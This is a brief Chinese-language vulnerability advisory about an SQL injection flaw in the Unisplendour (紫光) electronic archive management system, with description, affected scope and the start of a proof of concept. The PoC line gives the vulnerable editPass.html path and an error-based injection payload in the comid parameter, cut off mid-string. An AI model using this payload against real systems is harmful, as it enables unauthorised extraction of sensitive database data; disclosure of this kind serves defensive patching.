漏洞描述： 紫光软件系统有限公司（以下简称“紫光软件”）是中国领先的行业解决方案和IT服务提供商。 紫光电子档案管理系统存在SQL注入漏洞。攻击者可利用漏洞获取数据库敏感信息。 漏洞利用条件: / 漏洞影响范围： 紫光电子档案管理系统 漏洞复现： 1.Poc:/login/Login/editPass.html?comid=extractvalue(1,concat(char(1